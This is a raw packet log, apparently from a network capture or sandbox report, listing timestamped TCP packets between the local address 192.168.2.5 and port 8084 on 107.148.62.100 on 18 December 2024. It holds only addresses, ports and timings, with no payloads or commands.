Dec 18, 2024 13:32:04.607347965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.607383966 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.609251022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.609303951 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.610719919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.610734940 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.610783100 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.611368895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.611382961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.611437082 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.612093925 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.612111092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.612162113 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.613271952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.613667965 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.613709927 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.614283085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.614298105 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.614346027 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.615403891 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.615967989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.616015911 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.616590023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.617487907 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.617548943 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.618006945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.618522882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.618577957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.620189905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.620810986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.620862007 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.621532917 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.622324944 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.622374058 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.622817993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.623368979 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.623415947 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.731401920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.731430054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.731445074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.731580019 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.734462023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.734530926 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.736144066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.736160040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.736208916 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.741738081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.741755009 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.741767883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.741890907 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.750288010 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.750389099 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.751672029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.751688957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.751773119 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.758930922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.758944988 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.759074926 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.760696888 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.760719061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.760776043 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.805433989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.805802107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.805883884 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.806448936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.806783915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.806838989 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.807424068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.808043003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.808095932 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.809310913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.809793949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.809881926 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.810393095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.811634064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.811711073 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.811980009 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.812680006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.812772989 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.814512968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.815332890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.815423965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.815973997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.817224979 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.817295074 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.817374945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.817779064 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.817878008 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.819256067 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.819638014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.819710970 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.821679115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.823327065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.823343039 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:04.823422909 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:04.868974924 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.041057110 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.041304111 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.041398048 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.041496038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.042177916 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.042241096 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.042649984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.042679071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.042732000 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.043826103 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.044408083 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.044425011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.044460058 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.045615911 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.045666933 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.046319008 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.046334982 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.046379089 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.047333002 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.047348976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.047394037 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.048633099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.048650026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.048698902 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.049689054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.049705029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.049757957 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.050949097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.050966024 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.051022053 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.052181005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.052233934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.052284956 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.053519964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.053538084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.053582907 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.054781914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.054800034 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.054816008 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.054843903 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.055994034 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.056011915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.056049109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.057199001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.057224989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.057254076 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.058552980 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.058569908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.058608055 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.059724092 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.059741974 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.059756994 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.059775114 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.059808016 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.062376022 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.063493013 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.063508987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.063561916 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.064730883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.064748049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.064764023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.064793110 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.064834118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.066042900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.066061020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.066124916 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.067377090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.067394018 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.067436934 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.068460941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.068479061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.068527937 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.070966959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.070991993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.071039915 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.072154999 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.072171926 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.072232962 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.073512077 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.073535919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.073637962 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.131266117 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.131578922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.131638050 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.132074118 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.141443014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.141494989 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.141707897 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.142234087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.142283916 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.156085968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.156337976 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.156388044 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.156455040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.156874895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.156919956 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.170978069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.171246052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.171339035 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.233953953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.234219074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.234343052 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.234677076 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.234886885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.234950066 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.235372066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.237504005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.237580061 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.237756968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.242549896 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.242636919 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.242696047 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.243347883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.243410110 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.244822025 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.245184898 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.245230913 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.245734930 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.248166084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.248218060 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.248436928 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.249015093 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.249066114 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.252675056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.253002882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.253086090 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.253500938 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.255193949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.255243063 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.255712986 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.258522987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.258570910 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.258820057 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.259208918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.259251118 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.260601997 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.260883093 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.260943890 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.261320114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.265521049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.265564919 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.265609026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.266047955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.266096115 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.345343113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.345607996 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.345673084 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.346117973 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.353046894 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.353116989 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.353729963 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.354191065 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.354243040 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.370532990 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.370893955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.370984077 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.371510983 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.414179087 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.438019037 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.438303947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.438426018 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.438654900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.448718071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.448822021 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.449009895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.449341059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.449424982 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.451556921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.451931000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.452022076 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.452712059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.457277060 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.457393885 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.457597017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.457905054 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.458030939 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.459342003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.459722996 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.459800005 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.460174084 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.460249901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.460335970 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.460521936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.461117029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.461196899 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.462496996 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.462760925 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.462853909 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.463252068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.466710091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.466788054 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.467005014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.467530012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.467606068 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.472157001 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.472176075 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.472280979 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.472620964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.474550009 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.474625111 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.474860907 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.475137949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.475186110 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.479353905 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.479739904 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.479799032 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.480171919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.526885986 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.559657097 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.559947968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.560075998 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.560453892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.560698032 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.560759068 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.561336994 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.562110901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.562175989 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.566663027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.567060947 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.567073107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.567121983 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.567631006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.567681074 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.585175037 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.585345984 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.585408926 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.585675955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.641333103 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.652080059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.652332067 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.652419090 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.652724981 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.662782907 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.662837029 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:05.663167000 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.663739920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:05.663798094 CET	49705	8084	192.168.2.5	107.148.62.100
